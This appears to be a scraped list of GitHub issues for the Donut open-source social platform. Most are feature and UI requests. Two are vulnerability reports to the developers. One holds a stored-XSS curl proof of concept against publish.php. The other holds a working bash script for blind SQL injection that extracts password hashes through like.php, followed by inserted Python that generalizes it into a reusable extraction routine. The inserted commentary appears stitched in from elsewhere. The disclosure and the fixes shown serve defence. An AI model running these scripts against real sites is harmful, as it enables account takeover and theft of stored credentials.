codeuino / social-platform-donut-frontend
This is an Open Source social Platform where people can interact with Open Source expertise around the globe and work on different projects
To make the front-end of a feed page to show articles, projects, events, blogs, communities, etc.
Create authentication for login with Facebook. It's already done with Google and GitHub (refer to that). Follow the folder structure, pull code from the development branch, and send the PR to the same branch.
Need a great UX for the landing page after the user logs in
Hello Everyone, my name is Yashwanth, from IIT Bhubaneswar, India. I have good knowledge of HTML, CSS, JavaScript, Python and Java. I am specialized in Machine Learning, Deep Learning and Data Analytics. I am planning to apply for GSoC 2019 with Codeuino. I need help getting started. Assign me some task/sub-goal to get started working on and contributing to Codeuino. Thank you!
There are a few typos in the README which need to be removed, especially in the "What is Donut?" part.
The code base is not tested.
Use Mocha to test the code base.
Come up with a solution to show popular projects.
It must be the ratio of the number of likes to the number of dislikes: the maximum of this will be the most popular one.
For example: https://frappe.io/charts
New UI of landing page
A lot of the code in the repository is not formatted and the routes are not properly commented, which makes it difficult for a new user to navigate.
I would like to format and comment the code part by part.
For this, you can take inspiration from GitHub tags; also, you are free to show your creativity in this.
You can also produce 2-3 variations if you want.
A front-end for a discussion portal for members to discuss various topics, to be integrated with the front-end of the feed page.
Feature Suggestion
Dependabot is a special bot on GitHub which can update dependencies by opening PRs in the project, and configuring it can create a better experience for other developers to add PRs and issues in the organization.
Do implement this bot on the Donut project; I really like the idea behind it @jaskirat2000 :).
https://dependabot.com/ for more information.
After the update of the front-end landing page, we need to connect the front-end buttons and all the links with the respective back-end REST endpoints present.
The route to publish a project is made, but no HTML page is made.
Suggestions for design are appreciated.
Fix the social login buttons present on the dashboard; the backend API is already linked. You have to fix the styles and make sure the user is able to click them.
To update the README with the new UI.
Current logic is O(n^2); make it O(1) by using maps instead of arrays.
I am getting the following error when I run npm install --save:
Please include the following file with any support request:
npm ERR! /home/username/Social-Platform-Donut/npm-debug.log
Modifying the README a bit.
There are a lot of npm install commands. All this can be done by simply typing npm install inside the directory of the project. So a simple change in the README can make it cleaner. :D
This issue can be taken up by anyone.
Cheers!
Hi Developers,
You do not sanitize the 5 $_POST variables username, contentname, tagline, content, and genre against XSS vectors in publish.php when inserting new articles into the database. This can lead to different harmful actions performed against users by injected code. You should consider applying filter functions similar to the attached patch.
patch.txt
Note that this patch filters all HTML tags, which might not be an option for you as you use an editor that produces HTML tags. However, there are solutions for these cases too, e.g. HTML Purifier (http://htmlpurifier.org/).
POC:
This will insert malicious XSS code into each of the mentioned fields, with the username of user shown as the author, and does not even require authentication.
$ curl -d "username=user'#\"><script>alert('usr');</script><a href=\"#&contentname=<script>alert('title');</script>&tagline=<script>alert('tags');</script>&content=<script>alert('content');</script>&genre=<script>alert('gen');</script>" -X POST http://localhost/Social-Platform-Donut/596841401/publish.php
Further, you should consider authenticating the user and the calling script before processing POST requests in general and reading static contents from storage when accessible instead of passing and reading them from easily alterable request parameters.
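To make the sanitization choice concrete, here is an added Python illustration (not the reporter's patch and not Donut code) of the three options the report touches on for the five publish.php fields: interpolating stored values raw, stripping every tag as the attached patch does, and escaping each plain-text field for its HTML context while passing the editor-produced body through a small allowlist sanitizer in the spirit of HTML Purifier. The article template, the ATTACK submission (built from the PoC's values) and LEGIT_CONTENT are constructed for this example.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample submission mirroring the PoC's five POST values (not project data).
ATTACK = {
    "username": "user'#\"><script>alert('usr');</script><a href=\"#",
    "contentname": "<script>alert('title');</script>",
    "tagline": "<script>alert('tags');</script>",
    "content": "<script>alert('content');</script>",
    "genre": "<script>alert('gen');</script>",
}
# What an HTML-producing editor legitimately sends for the body field (constructed).
LEGIT_CONTENT = "<p>Donut is <b>open source</b> &amp; free</p>"

# Assumed article markup: the username lands in an attribute and a text node,
# the body is meant to carry editor HTML, everything else is plain text.
TEMPLATE = (
    '<article class="{genre}"><h1>{contentname}</h1>'
    '<p class="tagline">{tagline}</p>'
    '<a href="/user/{username}">{username}</a>'
    '<div class="body">{content}</div></article>'
)

TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value):
    """The attached patch's approach: remove anything tag-shaped, legit markup included."""
    return TAG_RE.sub("", value)


# Minimal allowlist sanitizer for the body field (stand-in for HTML Purifier):
# unknown tags and attributes vanish, script/style content is dropped entirely,
# links keep href only for http(s) URLs, and all text is re-escaped on output.
ALLOWED = {"p": set(), "b": set(), "i": set(), "em": set(), "strong": set(), "a": {"href"}}
DROP_CONTENT = {"script", "style"}


class Allowlist(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1                      # swallow the element and its text
        elif tag in ALLOWED and not self.skip:
            kept = "".join(
                f' {k}="{html.escape(v, quote=True)}"' for k, v in attrs
                if k in ALLOWED[tag] and v and v.lower().startswith(("http://", "https://"))
            )
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED and not self.skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))


def sanitize_html(fragment):
    parser = Allowlist()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_raw(article):
    """Vulnerable rendering: stored values interpolated as-is (what the PoC exploits)."""
    return TEMPLATE.format(**article)


def render_safe(article):
    """Escape plain-text fields for their HTML context (quote=True also neutralizes the
    attribute breakout in the username payload); allowlist-sanitize the body."""
    safe = {k: html.escape(v, quote=True) for k, v in article.items() if k != "content"}
    safe["content"] = sanitize_html(article["content"])
    return TEMPLATE.format(**safe)


if __name__ == "__main__":
    print("raw has live script:", "<script" in render_raw(ATTACK).lower())
    print("safe has live script:", "<script" in render_safe(ATTACK).lower())
    print("patch-style strip:", strip_tags(LEGIT_CONTENT))
    print("allowlist:", sanitize_html(LEGIT_CONTENT))
```

The username payload only bites because it lands inside an href attribute: html.escape with quote=True turns the closing quote into &quot;, so the attribute cannot be terminated early. strip_tags makes the attack inert but also flattens the editor's paragraph to plain text, which is exactly the limitation the report notes about filtering all tags; the allowlist keeps that markup, drops script content and event-handler attributes, and only passes http(s) links. The class here is a teaching stub; a maintained sanitizer such as HTML Purifier belongs in the real code path.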
Hi Developers,
You do not sanitize the two $_POST variables article and username when performing Like and Dislike actions in like.php and dislikes.php. This can be misused to modify the SQL queries you use. You can prevent the risk by filtering the two variables before using them, as in the following patch:
patch.txt
POC:
The vulnerabilities can, inter alia, be used to read content from the database in a blind SQL injection manner. The following code extracts the password hash of the user "user" by brute-forcing each character using a SQL injection in like.php:
(We assume an article with id=0 exists and was not yet liked by a user "user"; note that we could simply create an article as an unauthenticated user for this purpose: see #5)
#!/bin/bash
# Boolean-based blind extraction through like.php: a true condition removes the
# existing like of USERNAME, so the like count returned by like.php drops.
URL="http://localhost/Social-Platform-Donut/596841401/like.php"
USERNAME="user"              # any name; its like is the bit we observe
ARTICLE=0                    # the article id
ASCII_DEC=(0 $(seq 32 126))  # candidate char codes; 0 means "past the end of the value"
FIELD="password"             # the field we are extracting the content of
TABLE="users"                # the table we are extracting the content of
WHERE="username='user'"      # where clause for extracting
VALUE=""

# initial like entry: PREV is the like count with our like present
PREV=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}" -X POST "${URL}")
i=1  # substring index (1-based, as SUBSTRING expects)
j=0  # index into ASCII_DEC
while true; do
    if [ "$j" -ge "${#ASCII_DEC[@]}" ]; then
        echo "no candidate matched at position ${i}; extracted so far: ${VALUE}" >&2
        exit 1
    fi
    c=${ASCII_DEC[$j]}
    # condition that evaluates to true or false -> controls whether the like is removed or added
    QUERY="' AND '${c}'=ASCII(SUBSTRING((SELECT ${FIELD} FROM ${TABLE} WHERE ${WHERE}),${i},1)) AND '1'='1"
    RES=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}${QUERY}" -X POST "${URL}")
    if [ "$RES" -lt "$PREV" ]; then
        # our like was removed, so the condition held: c is the char code at position i
        if [ "$c" -eq 0 ]; then
            echo "found ${VALUE} for SELECT ${FIELD} FROM ${TABLE} WHERE ${WHERE}"
            exit 0
        fi
        printf -v ch "\\x$(printf '%02x' "$c")"  # decimal code -> character
        VALUE+="$ch"                              # store found chars
        i=$((i + 1))                              # extract next char
        j=0                                       # restart the candidate scan
        # reset the like state before probing the next position, then re-baseline PREV
        curl -s -d "article=${ARTICLE}&username=${USERNAME}' AND '1'='1" -X POST "${URL}" >/dev/null
        RES=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}' AND '1'='0" -X POST "${URL}")
    else
        j=$((j + 1))  # try next char code
    fi
    PREV="${RES}"
done
Further, you should consider authenticating the user and the calling script before processing POST requests in general and reading static contents from storage when accessible instead of passing and reading them from easily alterable request parameters.
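As an added example (not the reporter's script and not Donut code), the following Python models the behaviour the PoC depends on against an in-memory sqlite3 database and generalizes the bash loop into a reusable extraction routine: like_vulnerable concatenates the POST values into the SQL text the way the report describes like.php doing, like_safe binds them as parameters. The table and column names, the toggle-and-return-count logic and the stored hashes are assumptions for this example; sqlite's unicode()/substr() wrapped in ifnull() stand in for MySQL's ASCII(SUBSTRING(...)). It goes one step beyond the PoC by pulling a second constructed user's hash, and by showing the same probes against the parameterized variant.

```python
import sqlite3

ARTICLE = 0
CANDIDATES = [0] + list(range(32, 127))  # 0 marks "past end of value", then printable ASCII


def make_db():
    """Constructed sample database; schema and hashes are assumptions, not Donut's."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE likes (article INTEGER, username TEXT);
        INSERT INTO users VALUES ('user',  '$2y$10$hashOfUser');
        INSERT INTO users VALUES ('admin', '$2y$10$hashOfAdmin');
    """)
    return conn


def like_vulnerable(conn, article, username):
    """Assumed like.php pattern: toggle a like, return the article's like count.
    Both POST values are concatenated into the SQL text (the reported bug)."""
    cur = conn.cursor()
    exists = cur.execute(
        f"SELECT COUNT(*) FROM likes WHERE article={article} AND username='{username}'"
    ).fetchone()[0]
    if exists:
        cur.execute(f"DELETE FROM likes WHERE article={article} AND username='{username}'")
    else:
        cur.execute(f"INSERT INTO likes VALUES ({article}, '{username}')")
    return cur.execute(f"SELECT COUNT(*) FROM likes WHERE article={article}").fetchone()[0]


def like_safe(conn, article, username):
    """Same behaviour with bound parameters: the username is only ever a literal."""
    cur = conn.cursor()
    params = (article, username)
    exists = cur.execute(
        "SELECT COUNT(*) FROM likes WHERE article=? AND username=?", params
    ).fetchone()[0]
    if exists:
        cur.execute("DELETE FROM likes WHERE article=? AND username=?", params)
    else:
        cur.execute("INSERT INTO likes VALUES (?, ?)", params)
    return cur.execute("SELECT COUNT(*) FROM likes WHERE article=?", (article,)).fetchone()[0]


class LikeOracle:
    """Turns the like count into a boolean oracle, as the bash PoC does:
    a true condition deletes the victim's like, so the count drops."""

    def __init__(self, send, victim="user"):
        self.send = send
        self.victim = victim
        self.last = send(victim)  # create the like we will toggle (assumes none yet)

    def is_true(self, condition):
        res = self.send(f"{self.victim}' AND {condition} AND '1'='1")
        if res < self.last:                      # our like was removed -> condition held
            self.last = self.send(self.victim)   # put it back for the next probe
            return True
        self.last = res                          # a false branch may have inserted a junk row
        return False


def extract(send, field, table, where, max_len=64):
    """Character-by-character blind extraction. Returns None when no candidate matches
    a position, i.e. the endpoint is not leaking."""
    oracle = LikeOracle(send)
    value = ""
    for i in range(1, max_len + 1):
        for c in CANDIDATES:
            # sqlite spelling of the PoC's ASCII(SUBSTRING(...)); ifnull maps '' -> 0
            cond = (f"{c}=ifnull(unicode(substr((SELECT {field} FROM {table} "
                    f"WHERE {where}),{i},1)),0)")
            if oracle.is_true(cond):
                if c == 0:
                    return value                 # ran past the end of the secret
                value += chr(c)
                break
        else:
            return None
    return value


if __name__ == "__main__":
    vuln = make_db()
    print("vulnerable:", extract(lambda u: like_vulnerable(vuln, ARTICLE, u),
                                 "password", "users", "username='admin'"))
    safe = make_db()
    print("parameterized:", extract(lambda u: like_safe(safe, ARTICLE, u),
                                    "password", "users", "username='admin'"))
```

Against like_vulnerable the routine recovers the constructed admin hash with the same one-request-per-candidate scan as the bash PoC (a binary search over the code range would cut the request count, but the oracle is identical). Against like_safe every injected username is stored as a literal, no probe ever removes the victim's like, and extract gives up after the first position. Binding parameters is the fix that holds for every query; a filter function only helps if it is applied to every value on every statement, including the INSERT and DELETE, not just the lookup.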
Making new wireframes for the feedback page
Make a front-end Community (Organisation) dashboard for this Platform.
Just like we have dashboards on LinkedIn, Twitter, Facebook, etc. for the organisation to make changes.
So this has to be made in this way:
Reference to these examples:
https://goo.gl/images/6i4dC6
https://goo.gl/images/kLk3rM
https://goo.gl/images/qrtmm1
It should include everything that is required in the dashboard for a community.
The front end and back end of the platform are not integrated.
It is important to integrate them for version 1.